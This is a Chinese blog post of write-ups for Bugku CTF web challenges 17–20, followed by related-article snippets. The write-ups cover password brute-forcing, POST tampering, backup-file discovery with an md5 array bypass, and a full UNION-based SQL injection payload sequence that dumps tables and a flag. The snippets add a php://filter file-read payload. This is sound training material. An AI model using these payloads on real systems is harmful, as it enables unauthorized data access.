bugku 17~ 20write up(web)

最新推荐文章于 2021-04-10 19:56:50 发布
最新推荐文章于 2021-04-10 19:56:50 发布
阅读量392 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44105778/article/details/88397088
版权

一、第17题(输入密码查看flag)。

暴力破解,可得密码,然后输入密码可得flag
flag{bugku-baopo-hah}

二、 第18题(点击一百万次)

在这里插入图片描述
查看源码可以发现,url以post的方式提交点击的次数,那么使用hacker的post功能,直接修改clicks=1000000,即可得出flag
在这里插入图片描述

三、第19题(备份是个好习惯)

**小知识:*备份文件的扩展名一般为.swp,.bak
打开题目是一串字母,应该是MD5加密我们拿去解密下,竟然为空。
看看题目的提示,备份是个好习惯,是让我们寻找 .bak文件的
我们用御剑扫描后台,得出
在这里插入图片描述
那么尝试下http://123.06.87.240:8002/web16/index.php.bak
成功下载源码

<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
*/

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');//代码从?后开始截取到str中,也就是变量后开始截取字符串
$str = substr($str,1);//取$str中左边第1位开始取1位。
$str = str_replace('key','',$str);//在字符串$str中找到字符串key,并把它替换成空;
parse_str($str);//把查询字符串解析到变量中;
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
    echo $flag."取得flag";
}

代码要求我们构造出key1和key2的md5值相等,而它们本身却不相等,这时候用到一个小知识点:md5无法对数组进行构造,构造的结果都为NULL,这样我们只要让key1和key2是两个数组就可以了,(kekeyy绕过过滤key)
在这里插入图片描述

四、第20题(成绩单)在这里插入代码片

我们先输入1发现输出
在这里插入图片描述
输入-1发现没有输出信息
说明存在sql注入。
那么我们尝试下
输入 -1' union select 1,2,3,database()#
在这里插入图片描述
发现flag的所在的数据库
输入-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
在这里插入图片描述
爆出flag所在的表

输入-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g'#
vaoc
爆出flag所在的字段

输入-1' union select 1,2,3,skctf_flag from fl4g#

在这里插入图片描述
爆出flag为BUGKU{Sql_INJECT0N_4813drd8hz4}

giunwr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Write Modern Web Apps with the MEAN Stack Mongo Express AngularJS and epub
10-06
Write Modern Web Apps with the MEAN Stack Mongo Express AngularJS and Node.js 英文epub 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者或csdn删除
BugkuCTF web17_成绩单 writeup
Mitchell_Donovan的博客
01-10 873
web17_成绩单 原题链接 key:SQL手动注入 ①点开环境后页面长这样式的???? 根据提示随便输入1或2或3,分别出来了三个人的成绩 看到了表单类型,可知这是一道SQL注入题 ②先测试正常数据,用火狐的hackbar插件进行post请求,一切正常???? 加上单引号'则数据为空???? 但是再加上#就又正常了???? 由此可知有SQL注入漏洞 ③然后尝试获取列数,因为已经有名字和三科成绩了,所以就测试4或者更高 先从4开始吧,构造id=1' orde
Bugku CTF Web(17-20) Writeup
KRDecad3的博客
06-03 941
Bugku CTF Web(17-) Writeup 0x17flag在index里 打开页面有一个链接,点击链接发现URL改变, 则可能会有文件包含漏洞。 利用php://filter伪协议,php://filter简单理解为用在对文件的读写操作上。 payload: ?file=php://filter/read=convert.base64-encode/resour...
bugku web17
PRCORANGE的博客
04-10 117
题目 首先测试正常数据。 尝试在正常数据后加上单引号,发现数据为空 传入1’’#可以正常输出 尝试获取列数,得知是4列 尝试直接联合查询 获取数据库名 根据数据库去查表名 找列名 获取数据 找到flag ...
Bugku CTF web17Web
ChaoYue_miku的博客
02-28 541
0、打开网页,根据提示判断为SQL联合注入 要求查询列数相同,其中有Name、Math、 English、Chinese 一共四个数据,因此需要select 1,2,3,4 1、构造语句:id=0' union select 1,2,3,4# 有回显,进一步查询数据库 2、查询数据库:id=0' union select 1,2,3,database()# 得到数据库名:skctf 3、查询数据表:id=0' union select 1,2,3,table_name fro..
bugkuweb题-ctf入门(10-17
memery_key的博客
05-23 670
10、变量** http://120.24.86.145:8004/index1.php flag In the variable ! <?php error_reporting(0); // 关闭php错误显示 include "flag1.php"; // 引入flag1.php文件代码 highlight_file(__file__);
Write Modern Web Apps with the MEAN Stack Mongo Express AngularJS and azw3
10-06
Write Modern Web Apps with the MEAN Stack Mongo Express AngularJS and Node.js 英文azw3 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者或csdn删除
Write Web Apps with Dart
05-02
Web development,: DART, THE OPEN-SOURCE web programming language developed by Google, is designed for building everything from simple console utilities to full-featured applications for browsers and ...
Write Modern Web Apps with the MEAN Stack pdf
08-29
Write Modern Web Apps with the MEAN Stack - Mongo, Express, AngularJS, and Node.js (Develop and Design)
Write on Web-crx插件
04-02
语言:English 这用于在网页上类似于Edge浏览器进行写作。 因此,您现在可以通过在网络上撰写内容来发表演讲 此应用程序用于在网页上绘制,并且与Edge Browser在网络上编写功能非常相似。 当您在演示中并且要从网页...
Bugku web17 学生成绩查询
weixin_44522540的博客
02-23 227
十九、web17 学生成绩查询 id=1时,可以查询到成绩 id=1’ 为空 id=1’ and 1=1 # 与 id=1’ and 1=2 # 结果不同,由此判读可能存在sql注入 1、尝试获取列数 id=1’ order by 4 #,正常回显, id=1’ order by 5 #,异常,由此判断有4列 2、union联合查询 id=-1’ union select 1,2,3,4#,正常显示,说明存在这四列数据 3、爆库名、用户和版本 id=-1’ union select 1234,da
bugku web 17~24 write up
h0ryit的博客
05-05 1763
bugku web 17~24 write up flag在index里 打开页面有一个链接,点击链接发现url栏出现file,关键字想到文件包含漏洞。 关于文件包含漏洞的学习可以参考链接:https://zhuanlan.zhihu.com/p/25069779 直接修改file参数:http://120.24.86.145:8005/post/index.php?file=inde...
Bugkuweb:输入密码查看flag
ChenZIDu的博客
04-13 888
web 基础爆破 点进去 抓包之前先输入一遍! 抓完之后右键转到 intruder,先按 Positions 注意 pass后面的数组要有那两个符号,表示变量;利用clear 和add按钮 然后转到 Payloads 讲Paylad type 调到Numbers 因为是5位数所以从10000开始到99999 step调成1 然后开始跑 当他的 Length 返回值与其他不同就是密码了。 ...
BugkuCTF——webwriteup(持续更新)
热门推荐
过客璇璇的博客
03-23 6万+
BugkuCTF——webwriteup 平台网址:http://ctf.bugku.com/ 平台首页: web2 网址链接:http://120.24.86.145:8002/web2/ 页面: 一看只有好多滑稽,分数也不太高,应该不是很难,F12打开开发者工具看一下 得到ctf:flag KEY{Web-2-bugKssNNikls9100} 文件上传测试 链...
BUGKU_CTF WEB(10-19)writeUP
单核CPU的小朋友的博客
10-20 4万+
第11题:web5 查看页面源代码,发现被隐藏掉的代码。怀疑是javascript代码。网上试了各种解密和解压缩方法都不行。试了试直接在console控制台运行。成功运行并拿到flag。 第12题:头等舱。 查看页面源代码和web请求。发现什么都没有,空空如也。于是开了bt抓包。通过网页的response发现了headers中藏有flag值 第13题:网站被黑 首先查看网站源代码。发现网站没有什...
bugkuWeb小白解法---持续更新!
qq_42906381的博客
03-30 511
bugkuWeb!安排本文持续更新1滑稽一脸2验证码3请求get4请求post5矛盾 本文持续更新 这是我第二次使用 Markdown编辑器 。我将用他来写出自己的第一篇CSDN博客! 1滑稽一脸 打开网页之后,按下F12进入开发人员工具 点击调试程序,手慢的我已经让滑稽停不下来了 但是不经意间看见有个播放键,点一下,滑稽停了下来 舒服多了 然后搜索flag找到key复制 2验证码 打开网页 F...
Bugkuweb 成绩单
qq_26961571的博客
06-23 249
从这里开始进入SQL注入的普通模式啦!!撒花~~ ​ 虽然真的学过数据库,可是需要有很熟悉的PHP和数据库变量名字的理解,大概才能很好的学习这个部分。 首先打开这个题目, 快来查查成绩吧! 这里还是有一些提示的,框框里面要求输入1,2,3这种数字以便查询。但是...我们怎么能用普通的思维呢???!! 那么先什么都不输入看看。 什么都木有啊! 还是输个1看看。 接下来输了2和3也是有数据的,4就没有数据了,感觉这个数据库表...
bugku听说备份是个好习惯writeup
xuchen16的博客
09-18 1771
题目地址:http://120.24.86.145:8002/web16/ 备份文件源码泄漏使用 @王一航 的脚本爆得: 脚本下载地址:https://git.coding.net/yihangwang/SourceLeakHacker.git 下载获得index.php源码: 有两种方法绕过: 1,md5()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经...
Bugku-Web-Wp
Hydra的博客
11-02 3万+
目录   1.web2 2.计算器 3. web基础$_GET 4. web基础$_POST 5.矛盾 6. web3 7. 域名解析 8.你必须让他停下 9.本地包含 10.变量1  11.web5 12.头等舱 13.网站被黑 14. 管理员系统 15.web4  16.flag在index里 17.输入密码查看flag 18.点击一百万次 19. 备份...
learning markdown write for the web faster.pdf
最新发布
01-18
"Learning Markdown Write for the Web Faster.pdf" 是一份学习使用 Markdown 语法撰写网页的指南。Markdown 是一种轻量级的标记语言,用于简化网页编写过程并提高效率。这份指南介绍了如何使用 Markdown 语法编写...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值